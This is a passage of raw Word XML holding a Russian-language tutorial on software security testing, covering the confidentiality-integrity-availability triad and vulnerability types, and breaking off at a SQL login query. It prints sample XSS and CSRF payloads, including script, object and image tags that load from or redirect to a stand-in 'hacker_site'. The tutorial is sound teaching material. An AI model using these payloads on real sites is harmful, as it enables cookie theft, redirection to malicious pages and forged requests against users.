      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>конфиденциальность</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>целостность</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>доступность</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Конфиденциальность. Конфиденциальность - это сокрытие определенных ресурсов или информации. Под конфиденциальностью можно понимать ограничение доступа к ресурсу некоторой категории пользователей, или другими словами, при каких условиях пользователь авторизован получить доступ к данному ресурсу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Целостность. Существует два основных критерия при определении понятия целостности:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Доверие. Ожидается, что ресурс будет изменен только соответствующим способом определенной группой пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Повреждение и восстановление. В случае когда данные повреждаются или неправильно меняются авторизованным или не авторизованным пользователем, вы должны определить на сколько важной является процедура восстановления данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Доступность. Доступность представляет собой требования о том, что ресурсы должны быть доступны авторизованному пользователю, внутреннему объекту или устройству. Как правило, чем более критичен ресурс тем выше уровень доступности должен быть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Виды уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В настоящее время наиболее распространенными видами уязвимости в безопасности программного обеспечения являются:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS (Cross-Site Scripting) - это вид уязвимости программного обеспечения (Web приложений), при которой, на генерированной сервером странице, выполняются вредоносные скрипты, с целью атаки клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSRF / CSRF (Request Forgery) - это вид уязвимости, позволяющий использовать недостатки HTTP протокола, при этом злоумышленники работают по следующей схеме: ссылка на вредоносный сайт установливается на странице, пользующейся доверием у пользователя, при переходе по вредоносной ссылке выполняется скрипт, сохраняющий личные данные пользователя (пароли, платежные данные и т.д.), либо отправляющий СПАМ сообщения от лица пользователя, либо изменяет доступ к учетной записи пользователя, для получения полного контроля над ней.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code injections (SQL, PHP, ASP и т.д.) - это вид уязвимости, при котором становится возможно осуществить запуск исполняемого кода с целью получения доступа к системным ресурсам, несанкционированного доступа к данным либо выведения системы из строя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Server-Side Includes (SSI) Injection - это вид уязвимости, использующий вставку серверных команд в HTML код или запуск их напрямую с сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Authorization Bypass - это вид уязвимости, при котором возможно получить несанкционированный доступ к учетной записи или документам другого пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как тестировать ПО на безопасность?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приведем примеры тестирования ПО на предмет уязвимости в системе безопасности. Для этого Вам необходимо проверить Ваше программное обеспечение на наличия известных видов уязвимостей:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS (Cross-Site Scripting)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сами по себе XSS атаки могут быть очень разнообразными. Злоумышленники могут попытаться украсть ваши куки, перенаправить вас на сайт, где произойдет более серьезная атака, загрузить в память какой-либо вредоносный объект и т.д., всего навсего разместив вредоносный скрипт у вас на сайте. Как пример, можно рассмотреть следующий скрипт, выводящий на экран ваши куки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>либо скрипт делающий редирект на зараженную страницу:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;window.parent.location.href='http://hacker_site';&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>либо создающий вредоносный объект с вирусом и т.п.:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;object type="text/x-scriptlet" data="http://hacker_site"&gt;&lt;/object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для просмотра большего количества примеров рекомендуем посетить страничку: XSS (Cross Site Scripting)...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSRF / CSRF (Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наиболее частыми CSRF атаками являются атаки использующие HTML &lt;IMG&gt; тэг или Javascript объект image. Чаще всего атакующий добавляет необходимый код в электронное письмо или выкладывает на веб-сайт, таким образом, что при загрузке страницы осуществляется запрос, выполняющий вредоносный код. Примеры:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IMG SRC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/?</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SCRIPT</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SRC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script src="http://hacker_site/?command"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Javascript </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var foo = new Image();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>foo.src = "http://hacker_site/?command";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Code injections (SQL, PHP, ASP </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставки исполняемого кода рассмотрим на примере кода SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Форма входа в систему имеет 2 поля - имя и пароль. Обработка происходит в базе данных через выполнение SQL запроса:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT Username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM Users</w:t>
      </w:r>
    </w:p>
